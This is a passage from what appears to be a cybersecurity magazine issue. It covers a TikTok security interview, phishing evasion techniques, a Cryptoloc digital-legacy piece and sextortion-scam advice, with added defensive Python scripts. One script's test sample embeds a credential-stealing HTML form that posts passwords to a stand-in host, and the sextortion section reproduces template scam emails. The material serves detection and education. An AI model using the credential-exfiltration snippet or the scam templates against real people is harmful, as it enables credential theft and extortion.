the US, UK, Ireland, Singapore, and India for investing in the people, processes, and technology to keep<br />
our community safe.<br />
We continue to partner with leading organizations like the National Cyber Security Alliance to inspire<br />
leaders of the future and encourage people of all backgrounds to #BeCyberSmart.<br />
While celebrating our 1-year anniversary with HackerOne and the evolution of its Internet Bug Bounty<br />
(IBB) program, we worked to spotlight the top ethical hackers helping TikTok pioneer new defenses to<br />
protect over 1 billion people worldwide. Our comprehensive scope and commitment to transparency are<br />
what keep drawing new hackers to the program.<br />
What advice would you give to CISOs looking to raise cybersecurity awareness within their<br />
business and promote a ‘cyber risk’ culture?<br />
People are the foundation of any organization, and security is a team sport. At TikTok, our employees<br />
are our first line of defense. We're focused on creating a culture of security within our organization. That<br />
includes developing an internal video game to educate employees on cybersecurity and sharing<br />
@TikTokTips videos to encourage strong passwords, multi-factor authentication, and ways to spot<br />
phishing attempts. We also host a regular "Mission Possible" series with programming to engage cross-functional<br />
teams around the world, including a friendly "Security Feud" competition to win TikTok swag<br />
for claiming the top score on a range of cybersecurity topics.<br />
We believe our ability to protect against threats is only as strong as our ability to identify and work together<br />
to address them. This fall, we hosted a global security leaders offsite, featuring guest speakers and a<br />
"field trip" to IBM's Cyber Range, where our team was tested with a simulation requiring them to come<br />
together to manage seven crises simultaneously. We know it's not enough to build security into our<br />
product. We also have to test our own defenses, both as a team and with outside partners who help us<br />
continually improve the safety and security of our platform.<br />
You’ll be talking at next year’s Ransomware Resilience Summit series on ‘determining roles and<br />
responsibilities in a response’. How critical is it for the business to pre-determine their<br />
responses and responsibilities to an attack before it happens?<br />
There are a handful of sayings that I often share with my team. One is that, "we don't rise to the level of<br />
our expectations; we fall to the level of our training." Or to quote Ben Franklin, "an ounce of prevention is<br />
worth a pound of cure." It's critically important to have a plan, along with a backup plan. We have an<br />
entire team focused on business resilience and crisis management at TikTok. Their job is to anticipate<br />
worst-case scenarios and then create strategies to mitigate them.<br />
This team is part of TikTok's global Fusion Center operations, which are an important cornerstone to<br />
address the converged global threat landscape we face every day. These operations fuse critical<br />
business, security, legal, privacy, communications, and other cross-functional stakeholders to ensure<br />
alignment across all parts of the business. Our approach helps to provide a comprehensive view of how<br />
our business and community intersect with the world -- both on and off the platform. However, our<br />
mission is about more than protecting against malicious threats. It's also about ensuring the platform's<br />
availability and reliability for exciting global LIVE events like the Ultimate Super Bowl LV Pregame<br />
Experience, UFC Fight Night, TikTok UEFA EURO 2020 Show with Ed Sheeran, an innovative concert<br />
experience with The Weeknd, or an around-the-world museum tour to explore art and culture.<br />
Our all-hands, all-hazards incident management approach focuses on four pillars:<br />
1. Understanding our critical business operations, assets, services, and community<br />
2. Enabling over-the-horizon threat monitoring capabilities to detect and defend threats to our<br />
business operations, assets, services, and community<br />
3. Protecting against events that negatively impact our community and business on and off platform<br />
4. Rapid response capabilities to minimize impact if something bad were to happen<br />
We're also creating customized, threat-led defense technology and capabilities that combine industry-recognized<br />
frameworks like VERIS, MITRE ATT&CK, CSF, Data Defense, and ISO 27001. As the threat<br />
and cybercriminal landscape changes, so do we, building new protocols and systems to detect,<br />
manage, triage, and escalate all types of security events spanning ransomware, organized cyber crime,<br />
and inauthentic behavior. Our multidisciplinary approach enables us to catch and eliminate potential<br />
security and safety incidents or adversaries before they put our platform or community at risk.<br />
What are you most looking forward to by being a part of the Ransomware Resilience Summit<br />
series?<br />
Roland will be speaking alongside 30+ other experts at the upcoming Ransomware Resilience Summit<br />
series (London, February 22-23 and Washington D.C., March 29-30). Limited places are available to join<br />
TikTok, Netflix, Bupa, Microsoft, Oracle, Aston Martin, Trainline and many more behind closed doors and<br />
share best practices and lessons learned for tackling the unabating ransomware threat.<br />
It's critical for the business community to get together, educate, and connect with one another. Industry<br />
forums like the Ransomware Resilience Summit are important because they bring together key<br />
stakeholders -- from security practitioners to law enforcement officials -- to share lessons learned and<br />
enable stronger defenses. The ability to connect digitally and in real-time is not just important, but maybe<br />
the most important driver of economic opportunity and change in our lifetime. The more we can learn<br />
from and uplift one another, the safer and more secure our world will be. I look forward to sharing the<br />
stage with fellow practitioners next year and continuing these important conversations.<br />
With Cyber Security Awareness Month behind us, what do you have planned for the<br />
#BeCyberSmart campaign moving forward?<br />
Cybersecurity Awareness Month may be over, but we aim to encourage online safety year round. For<br />
International Fraud Awareness Week (November 14 - 20), we're joining the Association of Certified Fraud<br />
Examiners (ACFE) as a continuation of our #BeCyberSmart campaign. We're hosting a special<br />
#LearnOnTikTok LIVE stream on November 15 in conversation with @Alex_Falcone and industry experts<br />
sharing tips on how to avoid falling victim to fraud, because fraud is not a victimless crime. In the physical<br />
world, we follow expert guidance: "If you see something, say something." The same principle applies to<br />
the digital world, and people with cybersecurity skills have the power to protect those around them by<br />
sharing their expertise. We're welcoming security practitioners and companies across all industries to<br />
join us in creating TikTok videos to help others #BeCyberSmart.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 111<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
About the Author

Interviewer: Aaron Rawcliffe, Profile Director, Ransomware Resilience Summit, Kisaco Research

Interviewee: Roland Cloutier, Global Chief Security Officer, ByteDance / TikTok
Techniques Used by Hackers to Bypass Email Security Solutions

By Michael Aminov, Perception Point

There are many email security solutions on the market today, yet organizations still see phishing and malware reach their users. In the best case, the SOC team gets a report from the employee who received the message. More often, the first signal is an alert from the endpoint solution, raised only after the payload has reached the user's computer and been opened. In the worst case the organization is compromised: data is stolen or encrypted, and business processes face major disruption.

This article looks at the techniques hackers most commonly use to bypass traditional email security solutions.
Hosting malware on file-sharing services

Cloud storage and file-sharing applications such as OneDrive, Google Drive and SharePoint create a growing number of security blind spots for attackers to exploit.

Many file-sharing services offer a free tier, so an attacker can upload a payload at no cost. These services work through link sharing, and the link comes from the provider's own domain, which has a good reputation. The attacker then crafts an email and places the link inside it.

Why is this so difficult to detect?

Traditional solutions scan the URL, and here there is nothing suspicious in it: the link leads to a legitimate website. The reputation that passes the check belongs to the provider, not to the file behind the link. The site itself is safe, but when the user clicks the "download" button the malicious file is delivered, and once it is opened the user is compromised. Catching this requires the scanner to follow the link, retrieve the file and analyse it, rather than stopping at the domain.
Phishing scams avoid email security with login forms hidden inside local web pages

Here the attacker attaches a local HTML page containing the login form to the email instead of hosting the login page online. When the recipient opens the HTML attachment, the browser runs any JavaScript inside it by default. The page is rendered locally on the victim's computer, and only after credentials are entered into the fake login form does a piece of JavaScript (usually obfuscated) upload them straight into the attacker's hands.

Why is this difficult to detect?

• The email contains no embedded link that could be unpacked and scanned, so every engine based on reputation (URL reputation, domain legitimacy and so on) has nothing to work with. URL rewriting in Office 365 will not help either, because there is no URL in the message to rewrite.
• The address bar shows a local file path rather than a website name, so it looks harmless to the user.
• The one network artefact is the request that carries the stolen credentials out. Inspecting the attachment's script for form-submission targets, or opening it in a sandbox that records outbound requests, is what exposes it.
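The two evasions above can be triaged from the raw message itself. The script below is an added example, not Perception Point's code: it parses a constructed RFC 822 message, flags body links whose host is a file-sharing service (the host list is an assumption), and flags HTML attachments that combine a password field with script capable of posting it somewhere. The sample message, the regexes and the attachment's base64-hidden collection URL are all constructed for illustration.

```python
"""Added example (not Perception Point's code): triage a raw message for a link to a
reputable file-sharing host and for an HTML attachment carrying a local credential form.
The host list, regexes and sample message are assumptions chosen for illustration."""
import email
import re
from email import policy
from email.message import EmailMessage
from urllib.parse import urlparse

# Hosts whose good reputation says nothing about the file behind the link (assumed list).
FILE_SHARING_HOSTS = {
    "1drv.ms", "onedrive.live.com", "drive.google.com", "docs.google.com",
    "sharepoint.com", "dropbox.com", "wetransfer.com", "we.tl", "box.com",
}
URL_RE = re.compile(r"https?://[^\s<>\"']+", re.I)
PASSWORD_FIELD_RE = re.compile(r"<input[^>]*type\s*=\s*['\"]?password", re.I)
# Script that can send the form somewhere: fetch/XHR, a programmatic submit, or a remote action.
EXFIL_RE = re.compile(r"fetch\s*\(|XMLHttpRequest|\.submit\s*\(|action\s*=\s*['\"]?https?://", re.I)
OBFUSCATION_RE = re.compile(r"atob\s*\(|unescape\s*\(|eval\s*\(|String\.fromCharCode", re.I)


def is_file_sharing(url: str) -> bool:
    host = (urlparse(url).hostname or "").lower()
    return any(host == h or host.endswith("." + h) for h in FILE_SHARING_HOSTS)


def triage(raw: bytes) -> dict:
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = {"file_sharing_links": [], "html_credential_forms": []}
    # 1. Links in the message body that point at a file-sharing service.
    for part in msg.walk():
        if part.get_content_type() in ("text/plain", "text/html") and not part.is_attachment():
            for url in URL_RE.findall(part.get_content()):
                if is_file_sharing(url):
                    findings["file_sharing_links"].append(url)
    # 2. HTML attachments that combine a password field with code able to post it.
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if part.get_content_type() == "text/html" or name.lower().endswith((".html", ".htm")):
            body = part.get_content()
            if isinstance(body, bytes):
                body = body.decode("utf-8", "replace")
            if PASSWORD_FIELD_RE.search(body) and EXFIL_RE.search(body):
                findings["html_credential_forms"].append(
                    {"filename": name, "obfuscated": bool(OBFUSCATION_RE.search(body))})
    return findings


def build_sample() -> bytes:
    """Constructed sample: an invoice lure with a OneDrive link and an HTML attachment
    whose form posts the password to a base64-hidden URL (collect.example.test)."""
    m = EmailMessage()
    m["From"] = "Accounts Payable <ap@vendor.example>"
    m["To"] = "finance@corp.example"
    m["Subject"] = "Invoice 4471 - please review"
    m.set_content("Your invoice is ready: https://1drv.ms/u/s!AbCdEf\nA copy is attached.")
    html = (
        '<html><body><form id="f"><input name="u"><input type="password" name="p">'
        "<button>Sign in</button></form><script>"
        "document.getElementById('f').onsubmit=function(){"
        "fetch(atob('aHR0cHM6Ly9jb2xsZWN0LmV4YW1wbGUudGVzdC9wb3N0'),"
        "{method:'POST',body:new FormData(this)});return false;};"
        "</script></body></html>"
    )
    m.add_attachment(html, subtype="html", filename="Invoice_4471.html")
    return m.as_bytes()


if __name__ == "__main__":
    print(triage(build_sample()))
```

The file-sharing check deliberately does not say "malicious"; it says the URL's reputation is not evidence, so the linked file has to be fetched and analysed. The attachment check looks for the combination that matters (a password input plus code that can move it), which is what a reputation engine with no URL to score never sees.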
Spotting Spear Phishing

Attackers try to trick users into thinking they have landed on a familiar internal company portal. The attacker identifies a third-party service the company uses and builds a fake version of it.

Why is this difficult to detect?

• Employees expect email from these sources and treat it as internal, so they do not pay attention to the signs of phishing.
• Some company portals are accessible from the internet, which makes them even easier for attackers to spoof.

Consider a fake Okta login page. It contains all the visual elements and the company's logo, it is even served over HTTPS with a valid certificate, and it is simply waiting for the user to enter his or her credentials, an action they perform several times a day. A large portion of the phishing campaigns sent to companies are in fact impersonations of the company's own brand. Note that the padlock proves only that the connection is encrypted to whoever controls that domain; it says nothing about who that is.
ATO Detection

Account takeover (ATO) lets the attacker trade on the compromised account's credibility and history, both within its own company and with the external organizations it does business with. A fraudster with access to an account can cause tremendous damage.

Why is this difficult to detect?

• With ATO, the email comes from the vendor's own mail servers and the real sender's mailbox, so SPF, DKIM and DMARC all pass and there is no spoofing to detect.
• The attacker reads the existing email threads and waits for the perfect moment to inject a message about a funds transfer. They usually reply within a genuine thread, with a signature identical to the vendor's, and ask for payment to be sent to a different bank account.

Blacklisting email security vendor IP addresses

Attackers know that their target is well defended and assume the email security solution will visit and scan their phishing site before the message reaches the end user. So they blacklist the email security vendors' IP addresses: those addresses are served a harmless page (or nothing at all), while real users are served the phishing page.

Why is this difficult to detect?

By fingerprinting the different email security solutions, an attacker can learn the IP addresses from which each provider's services scan, and once fingerprinted they are easy to block. The scanner's verdict is then based on what the scanner was shown, not on what the victim will see. Scanning from unattributable egress addresses, and comparing what different vantage points receive for the same URL, is the countermeasure.
Recommendations

1) When selecting an email security solution, an organization should consider a service that identifies all threats before they arrive in a user's inbox. The ideal solution provides several detection layers to identify advanced phishing attacks as well as ATO, malware, 0-days and more. Look for services that:

• Dynamically scan 100% of emails and their embedded content (including attachments and the files behind links) before they arrive in the user's inbox, without affecting the user experience
• Use technology that deterministically provides verdicts on malware rather than relying on behavioral analysis
• Apply image recognition to the rendered pages behind URLs, so that brand impersonation is caught even when the text and domain look clean
• Detect account takeover

2) Educate your employees to always check the sender's authenticity by verifying that the display name and the email address match, which reduces the chance of a successful spoofing attempt.

3) Avoid clicking links if you are not sure about them. If you do click a link from an email, inspect the website carefully even if it seems to display harmless content.

4) Before giving away any details, always check that the domain is one you know and that the website is served over HTTPS rather than HTTP. HTTPS is necessary but not sufficient: as the Okta example above shows, phishing pages are routinely served with valid certificates, so it is the domain check that matters.
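Recommendation 2 and the fake-portal section above are the same check seen from two sides: does the name the user sees match the domain the message or link actually comes from? The script below is an added example, not Perception Point's code, that automates both for a mail gateway or a SOC enrichment step. The protected domains, brand names, homoglyph table and sample headers are assumptions; a production version would use a public-suffix list rather than the second-to-last label as the registrable domain.

```python
"""Added example (not Perception Point's code): the display-name check from
recommendation 2 and a lookalike-domain check for sender and link hosts. The protected
domains, brand names, homoglyph table and sample headers are assumptions."""
from email.utils import parseaddr
from urllib.parse import urlparse

PROTECTED = {"example.com", "okta.com"}   # assumed: the org's own domain and its SSO vendor
BRANDS = {"example", "okta"}               # names users expect to see in a sender or URL
# Character swaps commonly used to build lookalike hostnames (partial table).
HOMOGLYPHS = [("rn", "m"), ("vv", "w"), ("cl", "d"), ("0", "o"), ("1", "l"),
              ("3", "e"), ("5", "s"), ("7", "t")]


def normalise(label: str) -> str:
    label = label.lower()
    for bad, good in HOMOGLYPHS:
        label = label.replace(bad, good)
    return label


def edit_distance(a: str, b: str) -> int:
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def is_protected(host: str) -> bool:
    host = host.lower().rstrip(".")
    return any(host == p or host.endswith("." + p) for p in PROTECTED)


def lookalike(host: str):
    """Return the brand a host imitates, or None if it is protected or unrelated."""
    host = host.lower().rstrip(".")
    if not host or is_protected(host):
        return None
    labels = host.split(".")
    # Registrable label approximated as the second-to-last label (no public-suffix list offline).
    reg_label = normalise(labels[-2] if len(labels) >= 2 else labels[0])
    for brand in sorted(BRANDS):
        if edit_distance(reg_label, brand) <= 1:      # examp1e.com, exarnple.com, okta.co
            return brand
    for label in labels[:-1]:                          # okta-login.support, login.okta.evil.test
        n = normalise(label)
        for brand in sorted(BRANDS):
            if brand in n:
                return brand
    return None


def assess(from_header: str, urls) -> list:
    """Findings for one message: display-name tricks plus lookalike sender and link domains."""
    name, addr = parseaddr(from_header)
    domain = addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""
    findings = []
    if "@" in name and name.rsplit("@", 1)[-1].lower() != domain:
        findings.append(f"display name shows {name!r} but the message is from {domain}")
    elif any(b in normalise(name) for b in BRANDS) and not is_protected(domain):
        findings.append(f"display name {name!r} invokes a brand but {domain} is not a protected domain")
    brand = lookalike(domain)
    if brand:
        findings.append(f"sender domain {domain} imitates {brand}")
    for url in urls:
        host = urlparse(url).hostname or ""
        brand = lookalike(host)
        if brand:
            findings.append(f"link host {host} imitates {brand}")
    return findings


if __name__ == "__main__":
    print(assess("Okta Security <noreply@okta-login.support>", ["https://examp1e.com/sso"]))
```

Homoglyph normalisation before the edit-distance comparison is what catches the registrable-domain variants (examp1e, exarnple); the substring pass catches the brand buried in a subdomain or a hyphenated label, which is how most fake portals are actually named.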
About the Author

Michael Aminov is the founder and chief architect of Perception Point. Previously, he was the chief architect of CyActive, acquired by PayPal. Michael was also an officer in the classified elite cyber unit in the Israeli Intelligence Corps and was awarded the Israeli National Security Award.

https://perception-point.io
Michael.aminov@perception-point.io
How To Protect Your Digital Legacy

By Jamie Wilson, MD, Cryptoloc Technology Group

From your birth certificate to your will, much of your life is lived on paper, and now that paper is moving to the cloud. There are clear advantages to digitising our most important documents, but there is also an art to doing it properly. Here is how you can move your records online safely and securely, and ensure you are able to pass your digital legacy on when the time comes.

Why should you digitise your documents?

Over the course of our lives, we accrue a lot of documents that need to be stored safely: everything from contracts, wills, trust deeds, share portfolios, property and vehicle leases, insurance policies, tax returns, power of attorney documents and funeral plans to hard-earned degree certificates, precious family photos and spicy love letters.

If you are relying on paper documents, you could be setting yourself up for disaster, quite literally in the case of a fire, flood or even a tornado. Even if you avoid that worst-case scenario, information stored in physical formats deteriorates a little further every time it is handled, so it is essential to preserve paper documents by scanning and converting them into digital files.
If you are running a business, the number of documents and records you need to keep track of grows rapidly. And the more you rely on paper-based processes, the less efficient your business will be day to day, especially if it is geographically dispersed across multiple locations or, like so many businesses today, has employees working remotely.

Ditching bulky filing cabinets and replacing them with digital files that are quickly and easily searchable and accessible will save time, improve productivity and reduce operating costs now, while also putting you in good stead for the future.

Of course, it is one thing to have digital records of all your documents. The real question is how you can store and share those files securely, because if you cannot do that, you may as well have set all that paper on fire yourself.

And perhaps most importantly, you need to ensure that the right people, and only the right people, are able to access those files when you are no longer around to share them. Ultimately, that is what your digital legacy is all about.

Clouding the issue: Securing your digital legacy

To get value out of going digital, you need to store your files in a system that is both easy to manage and truly secure. This is something I found out the hard way.

I was working as an accountant when my father passed away from pancreatic cancer in 2010, leaving me with the task of rounding up and managing his will, superannuation details and other legal documents and files for my mother.

Losing a loved one is extremely hard; in some cases, it might be the hardest thing you ever go through. And, though it has never been easier to digitise our documents, it can be overwhelming for our next of kin to track down and gain access to these documents at a time when they are already distressed.

It is not something we tend to think about, or, for that matter, something we want to think about, but it is important that we can easily pass on this information when we pass away.

Knowing that data storage devices like hard drives and thumb drives were no safer in the event of a natural disaster than paper documents (and much easier to lose), I went looking for a secure cloud-based solution, and ended up having to create my own.

I didn't want other people to have the same challenges that I did at such a difficult time. I was also thinking about my accounting clients at the time. What if something happened to me? I had ownership of all their business strategy and financial documents, which they likely wouldn't have gotten back. That could have crippled their businesses.

I thought there had to be a solution on the market that enabled businesses and individuals to own their data; to create digital documents that would stand up in court as well as the paper-based originals; and to nominate a party or parties to be able to access the documents in the event of a loss. But I found that this technology and this level of security simply did not exist, so I set off on my journey to create both.
I worked with cybersecurity experts, mathematicians and encryption specialists to develop Cryptoloc's patented three-key encryption technology, which combines three different encryption algorithms into one multilayer process, and deployed it across several products.

One of those products is Cryptoloc Cloud, a secure cloud storage service that enables users to store, edit, share and sign documents with confidence; files can only be accessed by the people the user authorises, and every change is tracked.

These fully encrypted documents can then be sent to clients, customers, lawyers, government departments and anyone else who needs them, directly from Microsoft Outlook.

But what I'm proudest of is that Cryptoloc Cloud enables users to create a true data legacy: their files are preserved, but not just anyone can access them. Instead, files can only be accessed by users nominated by the deceased before their passing. This is a feature that any cloud storage service that is serious about preserving a person's digital legacy needs to offer.

In our case, the system enables users to nominate a person, such as a loved one or executor, to access their data in the event of their death, incapacitation, or another trigger event of their choosing. Users can nominate that person to access as many or as few of their files as they like; if they don't want to hand their entire digital legacy to one person, they can specify which of their drives the nominee should receive, and/or nominate multiple people.
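The nomination feature described above is, underneath, a key-release policy: the nominee must be able to open the files after the trigger event and not before, and the service that enforces the trigger should not be able to read the files on its own. The code below is an added example of one standard way to build such a policy, not Cryptoloc's scheme or code: the file key is split with Shamir's secret sharing into three shares (owner, nominee, service) so that any two reconstruct it, and the service only contributes its share to the nominee once the trigger is confirmed. The field prime, the 2-of-3 policy and the sample key are assumptions.

```python
"""Added example (not Cryptoloc's code or scheme): a 'nominated access' release built on
Shamir's secret sharing. Three shares of the file key go to the owner, the nominee and the
service; any two recover it, so the owner can always open the file, the nominee can open
it only once the service confirms the trigger event, and no single party (the service
included) learns the key alone. The field prime, the 2-of-3 policy and the sample key
are assumptions."""
import secrets

P = 2**521 - 1   # Mersenne prime, comfortably larger than a 32-byte key


def _poly(coeffs, x):
    """Evaluate the sharing polynomial at x over GF(P) (Horner's rule)."""
    acc = 0
    for c in reversed(coeffs):
        acc = (acc * x + c) % P
    return acc


def split(secret: bytes, n: int, k: int):
    """Split secret into n shares, any k of which reconstruct it."""
    s = int.from_bytes(secret, "big")
    if not 0 <= s < P:
        raise ValueError("secret too large for the field")
    coeffs = [s] + [secrets.randbelow(P) for _ in range(k - 1)]
    return [(x, _poly(coeffs, x)) for x in range(1, n + 1)]


def combine(shares, length: int) -> bytes:
    """Lagrange interpolation at x = 0 over GF(P)."""
    total = 0
    for i, (xi, yi) in enumerate(shares):
        num = den = 1
        for j, (xj, _) in enumerate(shares):
            if i != j:
                num = num * (-xj) % P
                den = den * (xi - xj) % P
        total = (total + yi * num * pow(den, -1, P)) % P
    return total.to_bytes(length, "big")


def provision(file_key: bytes) -> dict:
    """Escrow: one share each for the owner, the nominee and the service (2-of-3)."""
    owner, nominee, service = split(file_key, 3, 2)
    return {"owner": owner, "nominee": nominee, "service": service}


def release(escrow: dict, requester: str, trigger_confirmed: bool) -> bytes:
    """Service-side policy: combine its share with the requester's only when allowed."""
    if requester == "owner" or (requester == "nominee" and trigger_confirmed):
        return combine([escrow[requester], escrow["service"]], 32)
    raise PermissionError(f"{requester} may not recover the key before the trigger event")


if __name__ == "__main__":
    escrow = provision(bytes(range(32)))   # constructed sample key
    print(release(escrow, "owner", False).hex())
```

The file itself would be encrypted with the recovered key under any authenticated cipher; the point of the construction is that the trigger decision (death, incapacitation, or whatever the owner chose) is enforced by a party that holds one share and cannot decrypt anything with it, while the owner's own share plus the nominee's still recovers the key if the service disappears.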
Cryptoloc isn't the only cloud storage service to consider a user's digital legacy. Google's Inactive Account Manager, for instance, enables users who have data saved on Google services to assign their data to a digital executor when their account becomes inactive, and Apple has just introduced a Digital Legacy feature that lets users set a person as their Legacy Contact, giving that person access to their Apple ID account and data after they die.

I'm pleased to see more services realising the importance of a digital legacy feature, but many cloud storage providers still don't offer one. Instead, users are required to include an e-register of digital assets with their will, despite the fact that digital estate planning legislation is largely uncharted territory, and the legal rights that apply to our physical possessions or financial assets don't yet apply to our digital assets in most jurisdictions.

Some services actively prohibit the sharing of usernames and passwords, and the transferring of data between accounts, so leaving it to the courts to enforce your wishes is a legal minefield.

The benefits of being able to simply nominate someone to inherit files you've stored in the cloud, directly through the service itself, are obvious. For instance, if you're an estate lawyer, you can help your clients set up their own data legacy, and nominate you, or a loved one of their choosing, to receive their will and their other legal documents upon their passing.

Conversely, you can ensure that the documents you're holding onto yourself can be safely passed on to another lawyer, or to your clients themselves, when the time comes.
This is, after all, the whole reason I set out to create Cryptoloc in the first place. It's personally very satisfying to know that users can store all their important documents securely in one place, and establish a digital legacy that they can easily pass on to the people they choose.

Nobody should have to go through the hassle of putting a loved one's affairs in order while they're grieving for them, and now nobody does.

About the Author

Jamie Wilson is the founder and chairman of Cryptoloc, recognised by Forbes as one of the 20 Best Cybersecurity Startups to Watch in 2020. Headquartered in Brisbane, Australia, with offices in Japan, the US, South Africa and the UK, Cryptoloc has developed the world's strongest encryption technology and the world's safest cybersecurity platform, ensuring clients have complete control over their data. Jamie can be reached online at www.linkedin.com/in/jamie-wilson-07424a68 and at www.cryptoloc.com
Sextortion Email Scams
What to Do and How to Respond

By Harman Singh, director at Cyphere

Sextortion email scams are becoming more common, but how can you tell whether a message is a genuine threat or a scam? Here are some signs to look out for. First, if the person is asking for money in order to send pictures back, it is almost certainly a scam. Second, if the sender threatens physical violence against you or your loved ones unless you pay up right away, delete the email immediately and report it. Scammers may have obtained your information through a phishing attempt or another hacking technique, or simply from an old data breach: a common trick is to quote a real password of yours, leaked years ago, as "proof" that your device was hacked. Finally, before paying any of these scammers any amount of money, read about such scams online, especially on your country's law enforcement and action fraud websites, and consult someone who knows about internet security.

What is a sextortion email?

A sextortion scam uses blackmail to coerce the potential victim into paying money, under the threat of publishing compromising material or of physical violence. Scammers sometimes use photos they have obtained illegally as leverage for this type of cybercrime; in the mass-mailed variant, the "material" usually does not exist at all and the email is a bluff sent to thousands of addresses at once.
In a sextortion scam, someone contacts you online with the intention of extorting money from you. They might claim to have compromising photos or videos of you and threaten to send them out unless a ransom is paid.

What should I do if I'm receiving sextortion emails?

If you receive an email like this, do not reply and delete it. Never send any money or share your personal information with the sender. If you fear someone may actually have accessed your email account and taken compromising pictures of you, contact law enforcement as soon as possible for help in getting those images removed from wherever they were posted without consent.

What is a sextortion attack?

A sextortion attack is a type of cyber-attack in which the attacker gains access to sensitive information about the potential victim, such as pictures or videos, and then uses it to coerce them into performing other actions through fear and intimidation.

The attacker threatens to release the information publicly if the victim does not comply with their requests. This is among the scariest forms of cyber-attack because it can cause real-life damage and ruin a person's reputation, even though no physical harm was done directly.

Prevention tips against sextortion scams
Here are a few tips for preventing sextortion scams.

1. Use burner email addresses, also known as disposable email addresses, for temporary online accounts.
2. Don't share any photos that you think could be misused against you. If you aren't sure, don't do it, even with someone you trust.
3. Never send money to someone who contacts you unexpectedly.
4. If the person is asking for money in order to send pictures back, it is almost certainly a scam.
5. Do not give out personal data. If they know where you live and have your full name, it is even easier for them to extort more from you using fear.
6. Be equally careful with the personal information you share with anyone online, including on social media profiles.
7. If you fear someone may actually have accessed your account and taken compromising pictures of you, contact the authorities and check your local law enforcement websites. Ask for help in getting those images removed.
8. Use two-factor authentication on all accounts.
9. Always use strong passwords, so that it is harder to guess or crack your way into an account.
10. Create a unique password for every website (especially social media) and use a password manager to generate and store them, so that a password leaked from one site cannot be reused against another; a leaked password is exactly what these emails quote as "proof".
11. Set up automatic security alerts, so you know if your accounts have been accessed by someone other than yourself.
12. Don't open emails from unknown people, and always check the links inside them. Look out for red flags such as hyphens in the address, typosquatting errors or too-good-to-be-true offers, all of which hint at a possible scam.
How will I know if I'm being targeted by a sextortion email scam?

Sextortion scams have several warning signs to look out for. If the sender asks you for money in order to send pictures back, it is almost certainly a scam and the email should be deleted. Scammers also often use threats of physical violence or public humiliation as leverage against the potential victim. If you ever receive an email like this, delete it and do not send any money to the sender. Most importantly, if someone is threatening physical violence against you or your loved ones unless you pay up, contact law enforcement right away.
How to respond to a sextortion email

If you have received a sextortion email, the most important thing is not to engage: delete it and do not reply. Never send any money or share your sensitive information with the sender, and if images really have been posted without your consent, contact law enforcement for help in getting them removed.

What should you do after receiving a sextortion email?

Be careful after receiving such an email. Take the following steps:

1. Change the password of the account the email was sent to, and of any account that still uses a password quoted in the email.
2. Update the security alerts on your accounts.
3. Delete the email right away without responding to the sender.
4. Stay calm.
5. If the email reached a work account, alert your IT or security team.
6. Don't send money to the scammer.
7. Don't give up personal information.
8. Contact and report to law enforcement if images have been posted without consent or if you fear for your safety.
What if I've already paid money?

If you have already paid the scammer, contact your bank immediately: a card or bank-transfer payment can sometimes be stopped or charged back, whereas a cryptocurrency payment cannot be reversed and should instead be reported, together with the wallet address, to law enforcement. If the scammer has access to any of your accounts, including Facebook, YouTube or WhatsApp, change all associated passwords as soon as possible. Also be aware that if the scammers know the email address you use, they may have reached other online accounts tied to it.

If I've already paid money, is there anything else that can be done?

Seeking help from the relevant authorities is the best thing you can do if this has happened to you. They can find out where your images are being held and work with law enforcement in those countries to get them removed. Contacting an online security professional is also a good idea if you are not familiar with this sort of thing and need help keeping your private data secure in the future.
Sextortion email examples

There are many examples of sextortion email scams floating around the internet. Two typical ones are shown below.

Example 1: Threatening email asking for bitcoin

Dear (insert victim's name here),

You don't know me, but I've been watching you. I hacked into your computer and took some very personal pictures of you that I now have as leverage against you. You can view them on this site: (site with compromised images). If you would like to get the photos back, send $500 to this Bitcoin wallet address: (insert bitcoin address here)

You have 24 hours. If I don't get my money, these pictures will be released for everyone on the internet to see, and you'll never be able to scrub them from existence. You can keep it anonymous if you want; that should still scare you.

-Scammer

Example 2: "You've been hacked" email asking for money

Dear (insert victim's name here),

I know who you are and what you've been doing on your computer. I have recorded videos of everything, mainly the videos that show up when you were visiting adult websites, as well as other things like webcam footage from Skype sessions with family members or colleagues.

You should read this article: (insert a link to article)

If you don't take action and pay the ransom immediately, I will release these videos and photos of you on the internet so that your family and friends get a good laugh.

I'll be in touch soon!

-Scammer
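For a help desk or SOC that receives these reports, the useful work is to pull the indicators out of the message: the wallet address (validated, so the report does not carry a typo), the deadline, the "proof" password that tells the victim which old credential leaked, and the lure vocabulary. The script below is an added example, not Cyphere's code; the regexes, keyword list and the constructed sample are assumptions, and the address in the sample is Bitcoin's public genesis-block address, used only because it is well known and valid.

```python
"""Added example (not Cyphere's code): extract the indicators from a sextortion email
(Bitcoin address, deadline, quoted 'proof' password) and validate the address checksum so
a report carries a real wallet rather than a typo. Regexes, keyword list and the
constructed sample are assumptions."""
import hashlib
import re

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
BTC_LEGACY_RE = re.compile(r"\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b")
BTC_BECH32_RE = re.compile(r"\bbc1[ac-hj-np-z02-9]{8,87}\b", re.I)  # recognised only, not checksummed
DEADLINE_RE = re.compile(r"\b(\d{1,3})\s*(hours?|days?)\b", re.I)
PASSWORD_RE = re.compile(r"password\s*(?:is|:)\s*['\"]?([^\s'\"]{4,})", re.I)
KEYWORDS = ("webcam", "adult", "video", "bitcoin", "btc", "contacts", "hacked", "malware", "recorded")


def b58decode(s: str) -> bytes:
    n = 0
    for ch in s:
        n = n * 58 + B58_ALPHABET.index(ch)       # ValueError on a non-alphabet character
    raw = n.to_bytes((n.bit_length() + 7) // 8, "big")
    pad = len(s) - len(s.lstrip("1"))             # each leading '1' encodes a zero byte
    return b"\x00" * pad + raw


def valid_legacy_address(addr: str) -> bool:
    """Base58Check: 1 version byte + 20-byte hash + 4-byte double-SHA256 checksum."""
    try:
        data = b58decode(addr)
    except ValueError:
        return False
    if len(data) != 25:
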